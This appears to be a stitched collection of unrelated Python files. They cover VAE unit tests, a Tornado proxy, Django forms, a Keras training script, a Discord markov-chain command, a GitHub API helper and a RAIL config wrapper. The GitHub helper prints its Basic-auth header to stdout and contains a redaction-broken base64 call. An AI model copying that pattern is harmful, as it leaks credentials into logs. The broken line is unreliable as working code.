'valid': valid_ann, 'peaks': clus[cid].peaks}
data_clus[cid] = data_string
out_file = os.path.join(args.dir_out, "seqcluster.json")
# import pdb; pdb.set_trace()
with open(out_file, 'w') as handle_out:
# https://stackoverflow.com/a/50577730/1772223
def default(o):
if isinstance(o, np.int64): return int(o)
raise TypeError
handle_out.write(json.dumps([data_clus], default=default, skipkeys=True, indent=2))
return out_file
|
11548020
|
from __future__ import annotations
from abc import ABC, abstractmethod
from types import TracebackType
from typing import Optional, Type
from bs4 import BeautifulSoup
class ParserBase(ABC):
"""
Base class for parsers
"""
@abstractmethod
def __enter__(self) -> ParserBase:
"""Context manager __enter__"""
pass
@abstractmethod
def __exit__(
self, exc_type: Optional[Type[BaseException]], exc_val: Optional[BaseException], exc_tb: Optional[TracebackType]
) -> bool:
"""Context manager __exit__"""
pass
@abstractmethod
def parse(self, url: str) -> dict:
"""Main function used to parse the article from a URL"""
pass
@staticmethod
def fix_blockquotes(html: str) -> str:
"""Mobi doesn't seem to deal well with <p> tags inside <blockquote> tags. So we replace <p> with <div>"""
soup = BeautifulSoup(html, "html.parser")
for quote in soup.find_all("blockquote"):
if not quote.p:
continue
quote.p.wrap(soup.new_tag("div")) # Wrap all <p> elements with <div>
quote.p.unwrap() # Unwrap removes the element and replaces it with its content
return soup.decode()
|
11548123
|
from nose.tools import raises
import os
import numpy
import theano
import theano.tensor as T
from pylearn2.compat import OrderedDict
from pylearn2.config import yaml_parse
from pylearn2.models.mlp import (
MLP, Linear, CompositeLayer, ConvRectifiedLinear, SpaceConverter
)
from pylearn2.models.vae import VAE
from pylearn2.models.vae.kl import DiagonalGaussianPriorPosteriorKL
from pylearn2.models.vae.prior import Prior, DiagonalGaussianPrior
from pylearn2.models.vae.conditional import (
Conditional,
BernoulliVector,
DiagonalGaussian
)
from pylearn2.space import CompositeSpace, VectorSpace, Conv2DSpace
from pylearn2.utils.rng import make_np_rng
from pylearn2.utils import as_floatX
from pylearn2.utils import testing
class DummyVAE(object):
rng = make_np_rng(default_seed=11223)
batch_size = 100
class DummyPrior(Prior):
def initialize_parameters(self, *args, **kwargs):
self._params = []
class DummyConditional(Conditional):
def _get_default_output_layer(self):
return CompositeLayer(layer_name='composite',
layers=[Linear(layer_name='1', dim=self.ndim,
irange=0.01),
Linear(layer_name='2', dim=self.ndim,
irange=0.01)])
def _get_required_mlp_output_space(self):
return CompositeSpace([VectorSpace(dim=self.ndim),
VectorSpace(dim=self.ndim)])
###############################################################################
# models/vae/prior.py tests
###############################################################################
# -------------------------------- Prior --------------------------------------
def test_prior_set_vae():
"""
Prior.set_vae adds a reference to the vae and adopts the vae's rng
and batch_size attributes
"""
prior = DummyPrior()
vae = DummyVAE()
prior.set_vae(vae)
testing.assert_same_object(prior.vae, vae)
testing.assert_same_object(prior.rng, vae.rng)
testing.assert_equal(prior.batch_size, vae.batch_size)
@raises(RuntimeError)
def test_prior_raises_exception_if_called_twice():
"""
Prior.set_vae raises an exception if it has already been called
"""
prior = DummyPrior()
vae = DummyVAE()
prior.set_vae(vae)
prior.set_vae(vae)
def test_prior_get_vae():
"""
Prior.get_vae returns its VAE
"""
prior = DummyPrior()
vae = DummyVAE()
prior.set_vae(vae)
testing.assert_same_object(prior.get_vae(), vae)
# ------------------------- DiagonalGaussianPrior -----------------------------
def test_diagonal_gaussian_prior_initialize_parameters():
"""
DiagonalGaussianPrior.initialize_parameters works without crashing
"""
prior = DiagonalGaussianPrior()
vae = DummyVAE()
prior.set_vae(vae)
prior.initialize_parameters(nhid=5)
def test_diagonal_gaussian_prior_sample_from_p_z():
"""
DiagonalGaussianPrior.sample_from_p_z works without crashing
"""
prior = DiagonalGaussianPrior()
vae = DummyVAE()
prior.set_vae(vae)
prior.initialize_parameters(nhid=5)
prior.sample_from_p_z(10)
def test_diagonal_gaussian_prior_log_p_z():
"""
DiagonalGaussianPrior.log_p_z works without crashing
"""
prior = DiagonalGaussianPrior()
vae = DummyVAE()
prior.set_vae(vae)
prior.initialize_parameters(nhid=5)
z = T.tensor3('z')
prior.log_p_z(z)
###############################################################################
# models/vae/conditional.py tests
###############################################################################
# ----------------------------- Conditional -----------------------------------
@raises(ValueError)
def test_conditional_requires_nested_mlp():
"""
Conditional rejects non-nested MLPs
"""
mlp = MLP(nvis=10, layers=[Linear(layer_name='h', dim=10, irange=0.01)])
Conditional(mlp=mlp, name='conditional')
@raises(ValueError)
def test_conditional_rejects_invalid_output_layer():
"""
Conditional rejects invalid user-defined output layer
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01),
Linear(layer_name='mu', dim=5, irange=0.01)])
conditional = DummyConditional(mlp=mlp, name='conditional',
output_layer_required=False)
vae = DummyVAE()
conditional.set_vae(vae)
conditional.initialize_parameters(input_space=VectorSpace(dim=5), ndim=5)
def test_conditional_returns_mlp_weights():
"""
Conditional.get_weights calls its MLP's get_weights method
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01)])
conditional = DummyConditional(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
conditional.initialize_parameters(input_space=VectorSpace(dim=5), ndim=5)
numpy.testing.assert_equal(conditional.get_weights(), mlp.get_weights())
def test_conditional_returns_lr_scalers():
"""
Conditional.get_lr_scalers calls its MLP's get_lr_scalers method
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
W_lr_scale=0.01)])
conditional = DummyConditional(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
conditional.initialize_parameters(input_space=VectorSpace(dim=5), ndim=5)
testing.assert_equal(conditional.get_lr_scalers(), mlp.get_lr_scalers())
def test_conditional_modify_updates():
"""
Conditional.modify_updates calls its MLP's modify_updates method
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = DummyConditional(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
conditional.initialize_parameters(input_space=VectorSpace(dim=5), ndim=5)
updates = OrderedDict(zip(mlp.get_params(), mlp.get_params()))
testing.assert_equal(conditional.modify_updates(updates),
mlp.modify_updates(updates))
def test_conditional_set_vae():
"""
Conditional.set_vae adds a reference to the vae and adopts the vae's rng
and batch_size attributes
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01)])
conditional = DummyConditional(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
testing.assert_same_object(conditional.vae, vae)
testing.assert_same_object(conditional.rng, vae.rng)
testing.assert_equal(conditional.batch_size, vae.batch_size)
@raises(RuntimeError)
def test_conditional_raises_exception_if_called_twice():
"""
Conditional.set_vae raises an exception if it has already been called
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01)])
conditional = DummyConditional(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
conditional.set_vae(vae)
def test_conditional_get_vae():
"""
Conditional.get_vae returns its VAE
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01)])
conditional = DummyConditional(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
testing.assert_same_object(conditional.get_vae(), vae)
def test_conditional_initialize_parameters():
"""
Conditional.initialize_parameters does the following:
* Set its input_space and ndim attributes
* Calls its MLP's set_mlp method
* Sets its MLP's input_space
* Validates its MLP
* Sets its params and param names
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = DummyConditional(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
testing.assert_same_object(input_space, conditional.input_space)
testing.assert_equal(conditional.ndim, 5)
testing.assert_same_object(mlp.get_mlp(), conditional)
testing.assert_same_object(mlp.input_space, input_space)
mlp_params = mlp.get_params()
conditional_params = conditional.get_params()
assert all([mp in conditional_params for mp in mlp_params])
assert all([cp in mlp_params for cp in conditional_params])
def test_conditional_encode_conditional_parameters():
"""
Conditional.encode_conditional_parameters calls its MLP's fprop method
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = DummyConditional(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
X = T.matrix('X')
mlp_Y1, mlp_Y2 = mlp.fprop(X)
cond_Y1, cond_Y2 = conditional.encode_conditional_params(X)
f = theano.function([X], [mlp_Y1, mlp_Y2, cond_Y1, cond_Y2])
rval = f(as_floatX(numpy.random.uniform(size=(10, 5))))
numpy.testing.assert_allclose(rval[0], rval[2])
numpy.testing.assert_allclose(rval[1], rval[3])
# ----------------------------- BernoulliVector -------------------------------
def test_bernoulli_vector_default_output_layer():
"""
BernoulliVector's default output layer is compatible with its required
output space
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = BernoulliVector(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
def test_bernoulli_vector_sample_from_conditional():
"""
BernoulliVector.sample_from_conditional works when num_samples is provided
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = BernoulliVector(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
mu = T.matrix('mu')
conditional.sample_from_conditional([mu], num_samples=2)
@raises(ValueError)
def test_bernoulli_vector_reparametrization_trick():
"""
BernoulliVector.sample_from_conditional raises an error when asked to
sample using the reparametrization trick
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = BernoulliVector(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
mu = T.matrix('mu')
epsilon = T.tensor3('epsilon')
conditional.sample_from_conditional([mu], epsilon=epsilon)
def test_bernoulli_vector_conditional_expectation():
"""
BernoulliVector.conditional_expectation doesn't crash
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = BernoulliVector(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
mu = T.matrix('mu')
conditional.conditional_expectation([mu])
def test_bernoulli_vector_log_conditional():
"""
BernoulliVector.log_conditional doesn't crash
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = BernoulliVector(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
mu = T.matrix('mu')
samples = T.tensor3('samples')
conditional.log_conditional(samples, [mu])
# ---------------------------- DiagonalGaussian -------------------------------
def test_diagonal_gaussian_default_output_layer():
"""
DiagonalGaussian's default output layer is compatible with its required
output space
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = DiagonalGaussian(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
def test_diagonal_gaussian_sample_from_conditional():
"""
DiagonalGaussian.sample_from_conditional works when num_samples is provided
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = DiagonalGaussian(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
mu = T.matrix('mu')
log_sigma = T.matrix('log_sigma')
conditional.sample_from_conditional([mu, log_sigma], num_samples=2)
def test_diagonal_gaussian_reparametrization_trick():
"""
DiagonalGaussian.sample_from_conditional works when asked to sample using
the reparametrization trick
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = DiagonalGaussian(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
mu = T.matrix('mu')
log_sigma = T.matrix('log_sigma')
epsilon = T.tensor3('epsilon')
conditional.sample_from_conditional([mu, log_sigma], epsilon=epsilon)
def test_diagonal_gaussian_conditional_expectation():
"""
DiagonalGaussian.conditional_expectation doesn't crash
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = DiagonalGaussian(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
mu = T.matrix('mu')
log_sigma = T.matrix('log_sigma')
conditional.conditional_expectation([mu, log_sigma])
def test_diagonal_gaussian_log_conditional():
"""
DiagonalGaussian.log_conditional doesn't crash
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = DiagonalGaussian(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
mu = T.matrix('mu')
log_sigma = T.matrix('log_sigma')
samples = T.tensor3('samples')
conditional.log_conditional(samples, [mu, log_sigma])
def test_diagonal_gaussian_sample_from_epsilon():
"""
DiagonalGaussian.sample_from_epsilon doesn't crash
"""
mlp = MLP(layers=[Linear(layer_name='h', dim=5, irange=0.01,
max_col_norm=0.01)])
conditional = DiagonalGaussian(mlp=mlp, name='conditional')
vae = DummyVAE()
conditional.set_vae(vae)
input_space = VectorSpace(dim=5)
conditional.initialize_parameters(input_space=input_space, ndim=5)
conditional.sample_from_epsilon((2, 10, 5))
###############################################################################
# models/vae/__init__.py tests
###############################################################################
def test_one_sample_allowed():
"""
VAE allows one sample per data point
"""
encoding_model = MLP(layers=[Linear(layer_name='h', dim=10, irange=0.01)])
decoding_model = MLP(layers=[Linear(layer_name='h', dim=10, irange=0.01)])
prior = DiagonalGaussianPrior()
conditional = BernoulliVector(mlp=decoding_model, name='conditional')
posterior = DiagonalGaussian(mlp=encoding_model, name='posterior')
vae = VAE(nvis=10, prior=prior, conditional=conditional,
posterior=posterior, nhid=5)
X = T.matrix('X')
lower_bound = vae.log_likelihood_lower_bound(X, num_samples=1)
f = theano.function(inputs=[X], outputs=lower_bound)
rng = make_np_rng(default_seed=11223)
f(as_floatX(rng.uniform(size=(10, 10))))
def test_multiple_samples_allowed():
"""
VAE allows multiple samples per data point
"""
encoding_model = MLP(layers=[Linear(layer_name='h', dim=10, irange=0.01)])
decoding_model = MLP(layers=[Linear(layer_name='h', dim=10, irange=0.01)])
prior = DiagonalGaussianPrior()
conditional = BernoulliVector(mlp=decoding_model, name='conditional')
posterior = DiagonalGaussian(mlp=encoding_model, name='posterior')
vae = VAE(nvis=10, prior=prior, conditional=conditional,
posterior=posterior, nhid=5)
X = T.matrix('X')
lower_bound = vae.log_likelihood_lower_bound(X, num_samples=10)
f = theano.function(inputs=[X], outputs=lower_bound)
rng = make_np_rng(default_seed=11223)
f(as_floatX(rng.uniform(size=(10, 10))))
def test_convolutional_compatible():
"""
VAE allows convolutional encoding networks
"""
encoding_model = MLP(
layers=[
SpaceConverter(
layer_name='conv2d_converter',
output_space=Conv2DSpace(shape=[4, 4], num_channels=1)
),
ConvRectifiedLinear(
layer_name='h',
output_channels=2,
kernel_shape=[2, 2],
kernel_stride=[1, 1],
pool_shape=[1, 1],
pool_stride=[1, 1],
pool_type='max',
irange=0.01)
]
)
decoding_model = MLP(layers=[Linear(layer_name='h', dim=16, irange=0.01)])
prior = DiagonalGaussianPrior()
conditional = BernoulliVector(mlp=decoding_model, name='conditional')
posterior = DiagonalGaussian(mlp=encoding_model, name='posterior')
vae = VAE(nvis=16, prior=prior, conditional=conditional,
posterior=posterior, nhid=16)
X = T.matrix('X')
lower_bound = vae.log_likelihood_lower_bound(X, num_samples=10)
f = theano.function(inputs=[X], outputs=lower_bound)
rng = make_np_rng(default_seed=11223)
f(as_floatX(rng.uniform(size=(10, 16))))
def test_vae_automatically_finds_kl_integrator():
"""
VAE automatically finds the right KLIntegrator
"""
encoding_model = MLP(layers=[Linear(layer_name='h', dim=10, irange=0.01)])
decoding_model = MLP(layers=[Linear(layer_name='h', dim=10, irange=0.01)])
prior = DiagonalGaussianPrior()
conditional = BernoulliVector(mlp=decoding_model, name='conditional')
posterior = DiagonalGaussian(mlp=encoding_model, name='posterior')
vae = VAE(nvis=10, prior=prior, conditional=conditional,
posterior=posterior, nhid=5)
assert (vae.kl_integrator is not None and
isinstance(vae.kl_integrator, DiagonalGaussianPriorPosteriorKL))
###############################################################################
# costs/vae.py tests
###############################################################################
def test_VAE_cost():
"""
VAE trains properly with the VAE cost
"""
yaml_src_path = os.path.join(os.path.dirname(__file__),
'test_vae_cost_vae_criterion.yaml')
train_object = yaml_parse.load_path(yaml_src_path)
train_object.main_loop()
def test_IS_cost():
"""
VAE trains properly with the importance sampling cost
"""
yaml_src_path = os.path.join(os.path.dirname(__file__),
'test_vae_cost_is_criterion.yaml')
train_object = yaml_parse.load_path(yaml_src_path)
train_object.main_loop()
|
11548170
|
from utilities import integration_adaptors_logger as log
import tornado.web
from tornado import httpclient
from fake_spine.certs import Certs
from fake_spine import fake_spine_configuration
logger = log.IntegrationAdaptorsLogger(__name__)
class InboundProxyRequestHandler(tornado.web.RequestHandler):
def initialize(self, inbound_certs: Certs) -> None:
self.inbound_certs = inbound_certs
self.config = fake_spine_configuration.FakeSpineConfiguration()
async def post(self):
logger.info(f"request accepted {self.request} with headers: {self.request.headers}, and body: {self.request.body}")
logger.info(f"request being proxied to inbound service")
response = await httpclient.AsyncHTTPClient()\
.fetch(self.config.INBOUND_SERVER_BASE_URL,
raise_error=False,
method="POST",
body=self.request.body,
headers=self.request.headers,
client_cert=self.inbound_certs.local_cert_path,
client_key=self.inbound_certs.private_key_path,
ca_certs=self.inbound_certs.ca_certs_path,
validate_cert=self.config.FAKE_SPINE_PROXY_VALIDATE_CERT)
logger.info(f"inbound responded with code: {response.code} and body: {response.body}")
self.set_status(response.code)
self.write(response.body)
|
11548194
|
from django import forms
from author_review.models import *
class ArticleForm(forms.Form):
title = forms.CharField(label="题目", max_length=80, widget=forms.TextInput(attrs={'class': 'form-control'}))
abstract = forms.CharField(label="摘要", widget=forms.Textarea)
key = forms.CharField(label="关键词", max_length=100, widget=forms.TextInput(attrs={'class': 'form-control'}))
content = forms.CharField(label="主题", widget=forms.Textarea)
category = forms.CharField(label="类别", widget=forms.TextInput(attrs={'class': 'form-control'}))
# article_address = forms.FileField(label="文章的文件地址")
writers = forms.CharField(label="作者", widget=forms.TextInput(attrs={'class': 'form-control'}))
class RemarkForm(forms.Form):
review_name = forms.CharField(label="审稿人用户名", max_length=128, widget=forms.TextInput(attrs={'class': 'form-control'}))
article_id = forms.IntegerField(label="文章ID", widget=forms.TextInput(attrs={'class': 'form-control'}))
author_review = forms.CharField(label="评论", widget=forms.Textarea)
class UploadArticleForm(forms.Form):
class Meta:
model = Article
fields = 'article_address'
|
11548222
|
import numpy as np
from keras.models import Sequential, load_model
from keras.layers import Input, Dropout, Flatten, Conv2D, MaxPooling2D, Dense, Activation
from keras.optimizers import SGD
from keras.utils import np_utils
from keras.preprocessing.image import ImageDataGenerator
from keras.callbacks import TensorBoard
import itertools
# all images will be converted to this size
ROWS = 256
COLS = 256
CHANNELS = 3
train_image_generator = ImageDataGenerator(horizontal_flip=True, rescale=1./255, rotation_range=45)
test_image_generator = ImageDataGenerator(horizontal_flip=False, rescale=1./255, rotation_range=0)
train_generator = train_image_generator.flow_from_directory('train', target_size=(ROWS, COLS), class_mode='categorical')
test_generator = test_image_generator.flow_from_directory('test', target_size=(ROWS, COLS), class_mode='categorical')
train_generator.reset()
test_generator.reset()
model = Sequential()
model.add(Conv2D(64, (3,3), input_shape=(ROWS, COLS, CHANNELS)))
model.add(Activation('relu'))
model.add(Conv2D(64, (3,3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(4,4)))
model.add(Conv2D(64, (3,3)))
model.add(Activation('relu'))
model.add(Conv2D(64, (3,3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(4,4)))
model.add(Flatten())
model.add(Dropout(0.5))
model.add(Dense(400))
model.add(Activation('relu'))
model.add(Dropout(0.5))
model.add(Dense(200))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adamax', metrics=['accuracy'])
model.summary()
tensorboard = TensorBoard(log_dir='./logs/custom')
model.fit_generator(train_generator, steps_per_epoch=512, epochs=10, callbacks=[tensorboard], verbose=2)
print(model.evaluate_generator(test_generator, steps=1000))
|
11548253
|
import unittest
from util import *
from dateutil.parser import parse as parse_date
class TestUtil(unittest.TestCase):
def setUp(self):
pass
def test_merge_two_dicts(self):
result = merge_two_dicts({'a': 1}, {'b': 2})
self.assertEquals(result, {'a': 1, 'b': 2})
def test_weekdays_between(self):
noon_friday = parse_date('2017-03-31T12:00:00Z')
noon_monday = parse_date('2017-04-03T12:00:00Z')
noon_tuesday = parse_date('2017-04-04T12:00:00Z')
self.assertEquals(weekdays_between(noon_friday, noon_friday), 0.0)
self.assertEquals(weekdays_between(noon_friday, noon_monday), 1.0)
self.assertEquals(weekdays_between(noon_monday, noon_tuesday), 1.0)
self.assertEquals(
weekdays_between(parse_date('2017-06-03T00:12:02Z'), parse_date('2017-06-11T00:02:23Z')),
5.0
)
def test_flatten(self):
self.assertEquals(flatten([[1], [2]]), [1, 2])
def test_recursive_get(self):
self.assertEquals(recursive_get(dict([]), ['key']), None)
self.assertEquals(recursive_get({'a': 1}, ['key']), None)
self.assertEquals(recursive_get({'key': 1}, ['key']), 1)
self.assertEquals(recursive_get({'key1': {'key3': 2}}, ['key1', 'key2']), None)
self.assertEquals(recursive_get({'key1': {'key2': 2}}, ['key1', 'key2']), 2)
def test_window(self):
self.assertEquals(list(window([1, 2, 3], 2)), [(1, 2), (2, 3)])
def test_listify(self):
self.assertEquals(listify([1, 2, 3]), "\"1\",\"2\",\"3\"")
|
11548254
|
from objects.modulebase import ModuleBase
from objects.permissions import PermissionEmbedLinks
from utils.funcs import find_channel
from utils.formatters import trim_text
import random
from discord import Embed, Colour
class Module(ModuleBase):
usage_doc = '{prefix}{aliases} [channel]'
short_doc = 'Generate text using markov chain'
name = 'markov'
aliases = (name, 'markovchain')
category = 'Actions'
bot_perms = (PermissionEmbedLinks(), )
guild_only = True
async def on_call(self, ctx, args, **flags):
if len(args) == 1:
channel = ctx.channel
else:
channel = await find_channel(
args[1:], ctx.guild, global_id_search=True,
include_voice=False, include_category=False
)
if channel is None:
return await ctx.warn('Channel not found')
author = channel.guild.get_member(ctx.author.id)
if not author or not channel.permissions_for(author).read_messages:
return await ctx.error('You don\'t have permission to read messages in that channel')
if channel.is_nsfw() > ctx.channel.is_nsfw():
return await ctx.warn('Trying to access nsfw channel from sfw channel')
m = await ctx.send('Generating...')
try:
messages = await channel.history(
limit=1000, oldest_first=True,
before=ctx.message.edited_at or ctx.message.created_at
).flatten()
except Exception:
return await self.bot.edit_message(m, 'Failed to read message history')
words = [i for s in [m.content.split(' ') for m in messages if m.content] for i in s]
num_words = min((random.randint(5, 100), len(words)))
if num_words < 2:
return await self.bot.edit_message(
m, 'Not enough words to generate text')
pairs = [(words[i].lower(), words[i + 1]) for i in range(len(words) - 1)]
word_dict = {}
for word_1, word_2 in pairs:
if word_1 in word_dict:
word_dict[word_1].append(word_2)
else:
word_dict[word_1] = [word_2]
chain = [random.choice(words)]
for i in range(num_words):
word = chain[-1]
if word in word_dict:
next_word = random.choice(word_dict[word])
else:
next_word = random.choice(random.choice(tuple(word_dict.values())))
chain.append(next_word)
most_frequent_word = max(word_dict, key=lambda x: len(word_dict[x] if x else []))
e = Embed(colour=Colour.gold(), title='Markov Chain')
e.add_field(name='Channel', value=channel.mention)
e.add_field(name='Words analyzed', value=len(words))
e.add_field(
name='Most frequent word',
value=f'**{most_frequent_word[:256]}**: used **{len(word_dict[most_frequent_word])}** times ({round(len(word_dict[most_frequent_word]) / len(words), 4)}%)'
)
e.description = trim_text(' '.join(chain), max_len=2048)
e.set_footer(text=ctx.author, icon_url=ctx.author.avatar_url)
await self.bot.delete_message(m)
await ctx.send(embed=e)
|
11548261
|
import base64
import json
import time
import requests
from Utility.CDPConfigValues import CDPConfigValues
class WebConstants:
"""
Class definition for storing constants for authorization,URL's ,
Headers for data extraction and storage
"""
# Prepare authentication GitHub Header
github_base_url = "https://api.github.com/repos"
counter = 0
def __init__(self, project):
self.project_name = CDPConfigValues.cdp_projects[project]
self.commit_base_url = f"{WebConstants.github_base_url}/{self.project_name}/commits"
self.commit_url_paginated = self.commit_base_url + "?page={0}&per_page=100"
self.commit_details_url = self.commit_base_url + "/{0}"
self.commit_file_history_url = self.commit_base_url + "?path={0}"
self.issues_url = f"{WebConstants.github_base_url}/{self.project_name}/issues"
bug_label = CDPConfigValues.configFetcher.get('bug_label', project)
self.bug_url = self.issues_url + f"?labels={bug_label}" + "&&state=all&page={0}&per_page=100"
self.event_url = self.issues_url + "/{0}/events?page=0&per_page=100"
self.timeline_url = self.issues_url + "/{0}/timeline?page=0&per_page=100"
self.file_size_url = f"{WebConstants.github_base_url}/{self.project_name}/git/trees/" + "{0}?recursive=1"
self.contribution_url = f"{WebConstants.github_base_url}/{self.project_name}/contributors" + "?&page={}"
self.contents_url = f"{WebConstants.github_base_url}/{self.project_name}/contents/" + "{0}?ref={1}"
self.user_details_url = "https://api.github.com/users"
self.user_password = ""
self.header = ""
self.headers = {}
self.header_timer = {}
def fetch_header(self, header_type=None):
user_accounts = CDPConfigValues.github_username.split(",")
user_accounts = list(map(str.strip, user_accounts))
user_id = WebConstants.counter % len(user_accounts)
WebConstants.counter = WebConstants.counter + 1
githubPassword = CDPConfigValues.github_password
githubUserName = user_accounts[user_id]
encodedStr = githubUserName + ":" + githubPassword
if self.headers.get(f"{githubUserName}_{header_type}") is None or (
self.header_timer.get(f"{githubUserName}_{header_type}") is not None and
(time.time() - self.header_timer[f"{githubUserName}_{header_type}"]) > 3600):
self.header_timer[f"{githubUserName}_{header_type}"] = time.time()
self.user_password = base64.<PASSWORD>(encodedStr.encode()).decode("ascii")
if header_type is None:
self.header = {'Accept': 'application/vnd.github.symmetra-preview+json',
'User-agent': 'Mozilla/5.0',
'Authorization': 'Basic %s' % self.user_password}
else:
self.header = {'Accept': 'application/vnd.github.mockingbird-preview', 'User-agent': 'Mozilla/5.0',
'Authorization': 'Basic %s' % self.user_password}
print(f"header: {self.header}")
self.headers[f"{githubUserName}_{header_type}"] = self.header
else:
return self.headers[f"{githubUserName}_{header_type}"]
return self.header
@staticmethod
def fetch_proxy():
# proxy_list = [
# "172.16.17.32:80", "172.16.17.32:80"
# ]
proxy_list = CDPConfigValues.proxy_list.split(",")
proxy_id = WebConstants.counter % len(proxy_list)
return f"http://{proxy_list[proxy_id]}"
if __name__ == "__main__":
# For testing purpose
webConstants = WebConstants("project_1")
webConstants.fetch_header()
webConstants.fetch_header()
webConstants.fetch_header()
webConstants.fetch_header()
webConstants.fetch_header()
|
11548267
|
import dash
import dash_html_components as html
import dash_core_components as dcc
app = dash.Dash()
app.layout = html.Div([
dcc.Graph(
id='graph-1',
figure={
'data': [{
'y': [1, 4, 3]
}],
'layout': {
'height': 800
}
}
),
html.Hr(),
dcc.Graph(
id='graph-2',
style={
'height': 800
},
figure={
'data': [{
'y': [1, 5, 2]
}]
}
)
])
if __name__ == '__main__':
app.run_server(debug=True)
|
11548268
|
import os
import yaml
from pylib_multi_phy_model.multi_phy_configuration_model import fileType
from rail_scripts.generators.railConfig_sourceCodeGenerator import RAILConfig_generator
from rail_scripts.generators.railTest_rmrCommandGenerator import RailTest_rmrConfigGenerator
from rail_scripts.rail_adapter import RAILAdapter
class RAILScriptsWrapper(object):
rail_signature_function = None
@staticmethod
def run_rail_scripts(multi_phy_model, generate_debug_yaml=False, output_filename="rail_config", internal=False, sign=False):
railAdapter = RAILAdapter(mphyConfig=multi_phy_model, adapter_name=multi_phy_model.rail_adapter_version)
railAdapter.populateModel()
if railAdapter._railModelPopulated == False:
return
# Debug yaml file
if generate_debug_yaml:
railModelContext = railAdapter.generateRailModelContext()
rail_model_out = yaml.dump(railModelContext)
multi_phy_model.output_files.file.append(fileType("rail_model.yml", rail_model_out))
# Setup the context for the rail config generator
context = {'rail_internal': internal,
'enable_timing': internal,
'filename': output_filename}
# Add commit information to internal builds assuming we're in a git
# repo and have access to this.
if internal:
railAdapterPath = os.path.abspath(RAILAdapter.current_dir)
context['ra_commit'] = os.popen("git -C {} rev-parse HEAD".format(os.path.join(railAdapterPath))).read()[0:10]
context['rc_commit'] = os.popen("git -C {} rev-parse HEAD".format(os.path.join(railAdapterPath, "..", ".."))).read()[0:10]
# If a signature is requested then use the rail_signature_function to do
# that. We need to ensure that something has set this function because
# it is kept external to this code intentionally.
if sign:
assert RAILScriptsWrapper.rail_signature_function != None, "No signature function available!"
railModelContext = railAdapter.generateRailModelContext()
signatures = RAILScriptsWrapper.rail_signature_function(railModelContext)
railAdapter.setSignatures(signatures)
# Create and override the generator
generator = RAILConfig_generator(railAdapter)
generator.overrideContext(**context)
rail_config_h = generator.render(generator.template_path_h)
